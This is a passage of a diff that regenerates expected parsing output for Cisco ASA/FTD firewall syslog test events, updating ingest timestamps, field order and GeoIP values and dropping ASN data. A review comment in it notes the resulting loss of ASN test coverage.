192.168.2.2/0 type 3 code 1", "code": "302020", "kind": "event", @@ -490,7 +490,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615317400Z", + "ingested": "2021-12-14T14:38:14.656558405Z", "original": "May 5 17:51:17 dev01: %FTD-6-805001: Offloaded TCP Flow for connection 111111111 from fw111:10.10.10.10/111 (81.2.69.144/111) to fw111:192.168.2.2/111 (81.2.69.144/111)", "code": "805001", "kind": "event", @@ -569,7 +569,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615321Z", + "ingested": "2021-12-14T14:38:14.656558798Z", "original": "May 5 17:51:17 dev01: %FTD-6-805002: TCP Flow is no longer offloaded for connection 941243214 from net:10.192.18.4/51261 (10.192.18.4/51261) to fw109:10.192.70.66/443 (10.192.70.66/443)", "code": "805002", "kind": "event", 
@@ -643,7 +643,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:30.615326500Z", + "ingested": "2021-12-14T14:38:14.656559228Z", "original": "May 5 17:51:17 dev01: %FTD-7-710005: UDP request discarded from 192.168.2.2/68 to fw111:10.10.10.10/67", "code": "710005", "kind": "event", @@ -725,7 +725,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615332400Z", + "ingested": "2021-12-14T14:38:14.656559584Z", "original": "May 5 17:51:17 dev01: %FTD-6-303002: FTP connection from net:192.168.2.2/63656 to fw111:10.192.18.4/21, user testuser Stored file /export/home/sysm/ftproot/sdsdsds/tmp.log", "code": "303002", "kind": "event", @@ -768,7 +768,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:30.615337300Z", + "ingested": "2021-12-14T14:38:14.656559946Z", "original": "May 5 17:51:17 dev01: %FTD-7-710006: VRRP request discarded from 192.168.2.2 to fw111:192.18.4", "code": "710006", "kind": "event", @@ -788,16 +788,6 @@ ] }, { - "log": { - "level": "warning" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "iana_number": "1", - "transport": "icmp" - }, "observer": { "ingress": { "interface": { @@ -818,12 +808,15 @@ "dev01" ] }, + "log": { + "level": "warning" + }, "host": { "hostname": "dev01" }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:30.615341400Z", + "ingested": "2021-12-14T14:38:14.656560498Z", "original": "May 5 17:51:17 dev01: %FTD-4-313005: No matching connection for ICMP error message: icmp src fw111:10.192.33.100 dst fw111:192.18.4 (type 3, code 3) on fw111 interface. Original IP payload: udp src 192.18.4/53 dst 81.2.69.144/10872.", "code": "313005", "kind": "event", @@ -839,6 +832,13 @@ "asa": { "source_interface": "fw111" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "iana_number": "1", + "transport": "icmp" } }, { 
@@ -888,7 +888,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615346400Z", + "ingested": "2021-12-14T14:38:14.656560893Z", "original": "May 5 18:16:21 dev01: %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.2/0 gaddr 81.2.69.144/2 laddr 10.10.10.10/2 type 8 code 0", "code": "302021", "kind": "event", @@ -910,16 +910,6 @@ } }, { - "log": { - "level": "debug" - }, - "source": { - "address": "10.10.10.10", - "ip": "10.10.10.10" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "ingress": { "interface": { @@ -943,12 +933,19 @@ "10.10.10.10" ] }, + "log": { + "level": "debug" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "10.10.10.10", + "ip": "10.10.10.10" + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:30.615366600Z", + "ingested": "2021-12-14T14:38:14.656561306Z", "original": "May 5 18:22:35 dev01: %ASA-7-609001: Built local-host net:10.10.10.10", "code": "609001", "kind": "event", @@ -965,19 +962,12 @@ "asa": { "source_interface": "net" } - } - }, - { - "log": { - "level": "debug" - }, - "source": { - "address": "10.10.10.10", - "ip": "10.10.10.10" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "ingress": { "interface": { @@ -1001,13 +991,20 @@ "10.10.10.10" ] }, + "log": { + "level": "debug" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "10.10.10.10", + "ip": "10.10.10.10" + }, "event": { "severity": 7, "duration": 0, - "ingested": "2021-12-09T13:33:30.615371800Z", + "ingested": "2021-12-14T14:38:14.656561665Z", "original": "May 5 18:24:31 dev01: %ASA-7-609002: Teardown local-host identity:10.10.10.10 duration 0:00:00", "code": "609002", "kind": "event", @@ -1026,7 +1023,10 @@ "asa": { "source_interface": "identity" } - } + }, + "tags": [ + "preserve_original_event" + ] }, { "log": { 
@@ -1075,7 +1075,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615376200Z", + "ingested": "2021-12-14T14:38:14.656562023Z", "original": "May 5 18:29:32 dev01: %ASA-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 10.192.46.90/0", "code": "302020", "kind": "event", @@ -1141,7 +1141,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615380200Z", + "ingested": "2021-12-14T14:38:14.656562486Z", "original": "May 5 18:29:32 dev01: %ASA-6-302020: Built outbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 3", "code": "302020", "kind": "event", @@ -1220,7 +1220,7 @@ "severity": 6, "duration": 0, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:33:30.615384900Z", + "ingested": "2021-12-14T14:38:14.656562896Z", "original": "May 5 18:29:32 dev01: %ASA-6-302014: Teardown TCP connection 2960892904 for out111:10.10.10.10/443 to fw111:192.168.2.2/55225 duration 0:00:00 bytes 0 TCP Reset-I", "code": "302014", "kind": "event", @@ -1306,7 +1306,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615389300Z", + "ingested": "2021-12-14T14:38:14.656563247Z", "original": "May 5 18:29:32 dev01: %ASA-6-302013: Built outbound TCP connection 1588662 for intfacename:192.168.2.2/80 (81.2.69.144/80) to net:10.10.10.10/54839 (81.2.69.144/54839)", "code": "302013", "kind": "event", @@ -1386,7 +1386,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:30.615393400Z", + "ingested": "2021-12-14T14:38:14.656563602Z", "original": "May 5 18:29:32 dev01: %ASA-6-302012: Teardown dynamic UDP translation from fw111:10.10.10.10/54230 to out111:192.168.2.2/54230 duration 0:00:00", "code": "302012", "kind": "event", 
@@ -1456,7 +1456,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:30.615397100Z", + "ingested": "2021-12-14T14:38:14.656563959Z", "original": "May 5 18:40:50 dev01: %ASA-4-313004: Denied ICMP type=0, from laddr 10.10.10.10 on interface fw502 to 192.168.2.2: no matching session", "code": "313004", "kind": "event", @@ -1532,7 +1532,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615401300Z", + "ingested": "2021-12-14T14:38:14.656564314Z", "original": "May 5 18:40:50 dev01: %ASA-6-305011: Built dynamic TCP translation from fw111:10.10.10.10/57006 to out111:192.168.2.2/57006", "code": "305011", "kind": "event", @@ -1602,7 +1602,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:33:30.615404900Z", + "ingested": "2021-12-14T14:38:14.656564730Z", "original": "May 5 18:40:50 dev01: %ASA-2-106001: Inbound TCP connection denied from 192.168.2.2/43803 to 10.10.10.10/14322 flags SYN on interface out111", "code": "106001", "kind": "event", @@ -1679,7 +1679,7 @@ "event": { "severity": 2, "duration": 124000000000, - "ingested": "2021-12-09T13:33:30.615409Z", + "ingested": "2021-12-14T14:38:14.656565191Z", "original": "May 5 18:40:50 dev01: %ASA-2-302016: Teardown UDP connection 1671727 for intfacename:10.10.10.10/161 to net:1192.168.2.2/53356 duration 0:02:04 bytes 64585", "code": "302016", "kind": "event", @@ -1765,7 +1765,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:33:30.615413600Z", + "ingested": "2021-12-14T14:38:14.656565549Z", "original": "May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (81.2.69.144/161) to net:192.168.2.2/22638 (81.2.69.144/22638)", "code": "302015", "kind": "event", 
@@ -1852,7 +1852,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:33:30.615418900Z", + "ingested": "2021-12-14T14:38:14.656565915Z", "original": "May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (81.2.69.144/161) to net:192.168.2.2/22638 (81.2.69.144/22638)", "code": "302015", "kind": "event", @@ -1931,7 +1931,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:30.615423800Z", + "ingested": "2021-12-14T14:38:14.656566278Z", "original": "May 5 18:40:50 dev01: %ASA-4-106023: Deny tcp src fw111:10.10.10.10/64388 dst out111:192.168.2.2/443 by access-group \"out1111_access_out\" [0x47e21ef4, 0x47e21ef4]", "code": "106023", "kind": "event", @@ -2001,7 +2001,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:30.615429400Z", + "ingested": "2021-12-14T14:38:14.656566701Z", "original": "May 5 18:40:50 dev01: %ASA-4-106021: Deny TCP reverse path check from 192.168.2.2 to 10.10.10.10 on interface fw111", "code": "106021", "kind": "event", @@ -2072,7 +2072,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:33:30.615435100Z", + "ingested": "2021-12-14T14:38:14.656567072Z", "original": "May 5 19:02:58 dev01: %ASA-2-106006: Deny inbound UDP from 192.168.2.2/65020 to 10.10.10.10/65020 on interface fw111", "code": "106006", "kind": "event", @@ -2142,7 +2142,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615440700Z", + "ingested": "2021-12-14T14:38:14.656567443Z", "original": "May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/53089 to 10.10.10.10/443 flags FIN PSH ACK on interface out111", "code": "106015", "kind": "event", 
@@ -2212,7 +2212,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615446300Z", + "ingested": "2021-12-14T14:38:14.656567794Z", "original": "May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/17127 to 10.10.10.10/443 flags PSH ACK on interface out111", "code": "106015", "kind": "event", @@ -2282,7 +2282,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615469500Z", + "ingested": "2021-12-14T14:38:14.656568143Z", "original": "May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/24223 to 10.10.10.10/443 flags RST on interface fw111", "code": "106015", "kind": "event", @@ -2357,7 +2357,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615475600Z", + "ingested": "2021-12-14T14:38:14.656568566Z", "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built director stub TCP connection for fw1111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (81.2.69.144/10051)", "code": "302022", "kind": "event", @@ -2431,7 +2431,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615479800Z", + "ingested": "2021-12-14T14:38:14.656568916Z", "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built forwarder stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (81.2.69.144/10051)", "code": "302022", "kind": "event", @@ -2505,7 +2505,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615484Z", + "ingested": "2021-12-14T14:38:14.656569377Z", "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built backup stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.1682.2.2/10051 (81.2.69.144/10051)", "code": "302022", "kind": "event", 
@@ -2582,7 +2582,7 @@ "severity": 6, "duration": 0, "reason": "Cluster flow with CLU closed on owner", - "ingested": "2021-12-09T13:33:30.615488100Z", + "ingested": "2021-12-14T14:38:14.656569732Z", "original": "May 5 19:02:58 dev01: %ASA-6-302023: Teardown stub TCP connection for fw111:10.10.10.10/39210 to net:192.168.2.2/10051 duration 0:00:00 forwarded bytes 0 Cluster flow with CLU closed on owner", "code": "302023", "kind": "event", @@ -2661,7 +2661,7 @@ "severity": 6, "duration": 0, "reason": "Forwarding or redirect flow removed to create director or backup flow", - "ingested": "2021-12-09T13:33:30.615492300Z", + "ingested": "2021-12-14T14:38:14.656570104Z", "original": "May 5 19:02:58 dev01: %ASA-6-302023: Teardown stub TCP connection for net:10.10.10.10/10051 to unknown:192.168.2.2/39222 duration 0:00:00 forwarded bytes 0 Forwarding or redirect flow removed to create director or backup flow", "code": "302023", "kind": "event", @@ -2712,7 +2712,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:30.615496100Z", + "ingested": "2021-12-14T14:38:14.656570537Z", "original": "May 5 19:03:27 dev01: %ASA-7-111009: User 'aaaa' executed cmd: show access-list fw211111_access_out brief", "code": "111009", "kind": "event", @@ -2763,7 +2763,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:30.615499900Z", + "ingested": "2021-12-14T14:38:14.656570887Z", "original": "May 5 19:02:26 dev01: %ASA-7-111009: User 'aaaa' executed cmd: show access-list aaa_out brief", "code": "111009", "kind": "event", @@ -2839,7 +2839,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615503800Z", + "ingested": "2021-12-14T14:38:14.656571239Z", "original": "May 5 19:02:26 dev01: %ASA-6-106100: access-list fw111_out permitted tcp ptaaac/192.168.2.2(62157) -\u003e fw111/10.10.10.10(3452) hit-cnt 1 first hit [0x38ff326b, 0x00000000]", "code": "106100", "kind": "event", 
@@ -2916,7 +2916,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615508400Z", + "ingested": "2021-12-14T14:38:14.656571601Z", "original": "May 5 19:02:26 dev01: %ASA-6-106100: access-list fw111_out permitted tcp net/192.168.2.2(49033) -\u003e fw111/10.10.10.10(6007) hit-cnt 2 300-second interval [0x38ff326b, 0x00000000]", "code": "106100", "kind": "event", @@ -2962,7 +2962,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615512600Z", + "ingested": "2021-12-14T14:38:14.656572024Z", "original": "May 5 19:02:26 dev01: %ASA-6-302027: Teardown stub ICMP connection for fw1111:10.10.10.10/6426 to net:192.168.2.2/0 duration 1:00:04 forwarded bytes 56 Cluster flow with CLU closed on owner", "code": "302027", "kind": "event", @@ -3005,7 +3005,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615517800Z", + "ingested": "2021-12-14T14:38:14.656572384Z", "original": "May 5 19:02:26 dev01: %ASA-6-302026: Built director stub ICMP connection for fw111:10.10.10.10/32004 (8.8.8.5) to net:192.168.2.2/0 (81.2.69.144)", "code": "302026", "kind": "event", @@ -3074,7 +3074,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:30.615522100Z", + "ingested": "2021-12-14T14:38:14.656572741Z", "original": "May 5 19:02:26 dev01: %ASA-7-710005: UDP request discarded from 10.10.10.10/1985 to net:192.168.2.2/1985", "code": "710005", "kind": "event", @@ -3118,7 +3118,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615526400Z", + "ingested": "2021-12-14T14:38:14.656573101Z", "original": "May 5 19:02:26 dev01: %ASA-6-302025: Teardown stub UDP connection for net:192.168.2.2/123 to unknown:10.10.10.10/123 duration 0:01:00 forwarded bytes 48 Cluster flow with CLU removed from due to idle timeout", "code": "302025", "kind": "event", 
@@ -3161,7 +3161,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615531Z", + "ingested": "2021-12-14T14:38:14.656573449Z", "original": "May 5 19:02:26 dev01: %ASA-6-302024: Built backup stub UDP connection for net:192.168.2.2/9051 (8.8.8.5(19051) to fw111:10.10.10.10/123 (81.2.69.144/123)", "code": "302024", "kind": "event", @@ -3233,7 +3233,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:33:30.615535800Z", + "ingested": "2021-12-14T14:38:14.656573880Z", "original": "May 5 19:02:26 dev01: %ASA-3-106014: Deny inbound icmp src fw111:10.10.10.10 dst fw111:10.10.10.10(type 8, code 0)", "code": "106014", "kind": "event", @@ -3278,7 +3278,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:30.615541700Z", + "ingested": "2021-12-14T14:38:14.656574236Z", "original": "May 5 19:02:25 dev01: %ASA-4-733100: [192.168.2.2] drop rate-1 exceeded. Current burst rate is 0 per second, max configured rate is -4; Current average rate is 7 per second, max configured rate is -4; Cumulative total count is 9063", "code": "733100", "kind": "event", @@ -3361,7 +3361,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:33:30.615546400Z", + "ingested": "2021-12-14T14:38:14.656574597Z", "original": "May 5 19:02:25 dev01: %ASA-3-106010: Deny inbound sctp src fw111:10.10.10.10/5114 dst fw111:10.10.10.10/2", "code": "106010", "kind": "event", @@ -3437,7 +3437,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:30.615551500Z", + "ingested": "2021-12-14T14:38:14.656574953Z", "original": "May 5 19:02:25 dev01: %ASA-4-507003: tcp flow from fw111:10.10.10.10/49574 to out111:192.168.2.2/80 terminated by inspection engine, reason - disconnected, dropped packet.", "code": "507003", "kind": "event", 
@@ -3500,7 +3500,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:30.615555400Z", + "ingested": "2021-12-14T14:38:14.656575409Z", "original": "Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed URL 10.20.30.40:http://10.20.30.40/", "code": "304001", "kind": "event", @@ -3562,7 +3562,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:30.615560100Z", + "ingested": "2021-12-14T14:38:14.656575862Z", "original": "Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed URL someuser@10.20.30.40:http://10.20.30.40/IOFUHSIU98[0]", "code": "304001", "kind": "event", @@ -3624,7 +3624,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:30.615565100Z", + "ingested": "2021-12-14T14:38:14.656576220Z", "original": "Apr 27 17:54:52 dev01: %ASA-5-304001: 10.20.30.40 Accessed JAVA URL 10.20.30.40:http://10.20.30.40/some/longer/url-asd-er9789870[0]_=23", "code": "304001", "kind": "event", @@ -3686,7 +3686,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:30.615568800Z", + "ingested": "2021-12-14T14:38:14.656576585Z", "original": "Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed JAVA URL someuser@10.20.30.40:http://10.20.30.40/", "code": "304001", "kind": "event", @@ -3711,20 +3711,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", 
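Review bot: The regenerated expectation at `@@ -3711,20 +3711,14 @@` removes the entire `destination.as` object (`"number": 20712`, `"organization": {"name": "Andrews \u0026 Arnold Ltd"}`) for 81.2.69.144 while only the `geo` values are swapped, so this pipeline test no longer asserts that ASN enrichment happens at all. That is presumably because the new test GeoIP database shipped with elastic-package v0.31.0 has no ASN record for that address rather than because the geoip processor in the pipeline changed, but nothing in the diff or the changelog entry ("Regenerate test files using the new GeoIP database") distinguishes the two. If ASN enrichment is part of what this integration promises, it would be worth either adding an ASN entry for the supported test subnet to the test database or recording the coverage loss explicitly, e.g. `- description: Regenerate test files using the new GeoIP database (test IPs no longer carry ASN data, so source.as/destination.as are not asserted)`. The same `as` removal repeats in every later hunk of this file, so confirming once that the actual output truly lacks the field (and was not silently dropped by a processor change) covers all of them.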
@@ -3734,20 +3728,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -3797,7 +3785,7 @@ "severity": 6, "duration": 3602000000000, "reason": "Connection timeout", - "ingested": "2021-12-09T13:33:30.615573200Z", + "ingested": "2021-12-14T14:38:14.656577035Z", "original": "Apr 27 04:12:23 dev01: %ASA-6-302304: Teardown TCP state-bypass connection 2751765169 from server.deflan:81.2.69.144/54242 to server.deflan:81.2.69.144/9101 duration 1:00:02 bytes 245 Connection timeout", "code": "302304", "kind": "event", @@ -3875,7 +3863,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:30.615577900Z", + "ingested": "2021-12-14T14:38:14.656577395Z", "original": "Apr 27 02:02:02 dev01: %ASA-4-106023: Deny tcp src outside:10.10.10.2/56444 dst srv:192.168.2.2/51635(testhostname.domain) by access-group \"global_access_1\"", "code": "106023", "kind": "event", @@ -3952,7 +3940,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:30.615582100Z", + "ingested": "2021-12-14T14:38:14.656577804Z", "original": "Oct 20 2019 15:15:15 dev01: %ASA-5-106100: access-list testrulename denied tcp insideintf/somedomainname.local(27218) -\u003e OUTSIDE/192.168.157.61(53) hit-cnt 1 first hit [0x16847359, 0x00000000]", "code": "106100", "kind": "event", @@ -3975,16 +3963,6 @@ } }, { - "log": { - "level": "notification" - }, - "source": { - "address": "console", - "domain": "console" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "dev01", "product": "asa", 
@@ -4001,12 +3979,19 @@ "console" ] }, + "log": { + "level": "notification" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "console", + "domain": "console" + }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:30.615587400Z", + "ingested": "2021-12-14T14:38:14.656578161Z", "original": "Apr 27 02:03:03 dev01: %ASA-5-111004: console end configuration: OK", "code": "111004", "kind": "event", @@ -4022,19 +4007,12 @@ }, "cisco": { "asa": {} - } - }, - { - "log": { - "level": "notification" - }, - "source": { - "address": "10.10.0.87", - "ip": "10.10.0.87" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "dev01", "product": "asa", @@ -4056,15 +4034,22 @@ "10.10.0.87" ] }, + "log": { + "level": "notification" + }, "host": { "user": { "name": "enable_15" }, "hostname": "dev01" }, + "source": { + "address": "10.10.0.87", + "ip": "10.10.0.87" + }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:30.615592700Z", + "ingested": "2021-12-14T14:38:14.656578516Z", "original": "Apr 27 02:03:03 dev01: %ASA-5-111010: User 'enable_15', running 'CLI' from IP 10.10.0.87, executed 'clear'", "code": "111010", "kind": "event", @@ -4080,7 +4065,10 @@ "asa": { "command_line_arguments": "'clear'" } - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { @@ -4112,7 +4100,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:30.615597300Z", + "ingested": "2021-12-14T14:38:14.656578868Z", "original": "Apr 27 02:03:03 dev01: %ASA-5-502103: User priv level changed: Uname: enable_15 From: 1 To: 15", "code": "502103", "kind": "event", @@ -4190,7 +4178,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615601800Z", + "ingested": "2021-12-14T14:38:14.656579221Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-605004: Login denied from 10.10.1.212/51923 to FCD-FS-LAN:10.10.1.254/https for user \"*****\"", "code": "605004", "kind": "event", 
@@ -4211,16 +4199,6 @@ } }, { - "log": { - "level": "informational" - }, - "source": { - "address": "10.10.0.87", - "ip": "10.10.0.87" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "dev01", "product": "asa", @@ -4242,15 +4220,22 @@ "10.10.0.87" ] }, + "log": { + "level": "informational" + }, "host": { "user": { "name": "admin" }, "hostname": "dev01" }, + "source": { + "address": "10.10.0.87", + "ip": "10.10.0.87" + }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615606600Z", + "ingested": "2021-12-14T14:38:14.656579646Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-611102: User authentication failed: IP address: 10.10.0.87, Uname: admin", "code": "611102", "kind": "event", @@ -4265,7 +4250,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "log": { @@ -4321,7 +4309,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615611800Z", + "ingested": "2021-12-14T14:38:14.656580022Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-605005: Login permitted from 10.10.0.87/6651 to FCD-FS-LAN:10.10.1.254/ssh for user \"admin\"", "code": "605005", "kind": "event", @@ -4342,16 +4330,6 @@ } }, { - "log": { - "level": "informational" - }, - "source": { - "address": "10.10.0.87", - "ip": "10.10.0.87" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "dev01", "product": "asa", @@ -4373,15 +4351,22 @@ "10.10.0.87" ] }, + "log": { + "level": "informational" + }, "host": { "user": { "name": "admin" }, "hostname": "dev01" }, + "source": { + "address": "10.10.0.87", + "ip": "10.10.0.87" + }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615615400Z", + "ingested": "2021-12-14T14:38:14.656580388Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-611101: User authentication succeeded: IP address: 10.10.0.87, Uname: admin", "code": "611101", "kind": "event", 
@@ -4396,37 +4381,12 @@ }, "cisco": { "asa": {} - } - }, - { - "log": { - "level": "notification" - }, - "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "Oxfordshire", - "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" - } - }, - "address": "81.2.69.144", - "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "dev01", "product": "asa", @@ -4445,12 +4405,31 @@ "81.2.69.144" ] }, + "log": { + "level": "notification" + }, "host": { "hostname": "dev01" }, + "source": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-ENG", + "city_name": "London", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "England", + "location": { + "lon": -0.0931, + "lat": 51.5142 + } + }, + "address": "81.2.69.144", + "ip": "81.2.69.144" + }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:30.615620200Z", + "ingested": "2021-12-14T14:38:14.656580757Z", "original": "Apr 27 02:03:03 dev01: %ASA-5-713049: Group = 81.2.69.144, IP = 81.2.69.144, Security negotiation complete for LAN-to-LAN Group (81.2.69.144) Responder, Inbound SPI = 0x276b1da2, Outbound SPI = 0x0e1a581d", "code": "713049", "kind": "event", @@ -4464,7 +4443,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "log": { 
@@ -4473,20 +4455,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -4533,7 +4509,7 @@ "severity": 4, "duration": 1936000000000, "reason": "User Requested", - "ingested": "2021-12-09T13:33:30.615655900Z", + "ingested": "2021-12-14T14:38:14.656581221Z", "original": "Apr 27 02:03:03 dev01: %ASA-4-113019: Group = 81.2.69.144, Username = 81.2.69.144, IP = 81.2.69.144, Session disconnected. Session Type: LAN-to-LAN, Duration: 0h:32m:16s, Bytes xmt: 297103, Bytes rcv: 1216163, Reason: User Requested", "code": "113019", "kind": "event", @@ -4554,19 +4530,6 @@ } }, { - "log": { - "level": "warning" - }, - "source": { - "user": { - "name": "john" - }, - "address": "192.168.50.3", - "ip": "192.168.50.3" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "dev01", "product": "asa", @@ -4588,12 +4551,22 @@ "192.168.50.3" ] }, + "log": { + "level": "warning" + }, "host": { "hostname": "dev01" }, + "source": { + "user": { + "name": "john" + }, + "address": "192.168.50.3", + "ip": "192.168.50.3" + }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:30.615660Z", + "ingested": "2021-12-14T14:38:14.656581574Z", "original": "Apr 27 02:03:03 dev01: %ASA-4-722051: Group \u003cVPN5Policy\u003e User \u003cjohn\u003e IP \u003c192.168.50.3\u003e IPv4 Address \u003c192.168.50.5\u003e IPv6 address \u003c::\u003e assigned to session", "code": "722051", "kind": "event", 
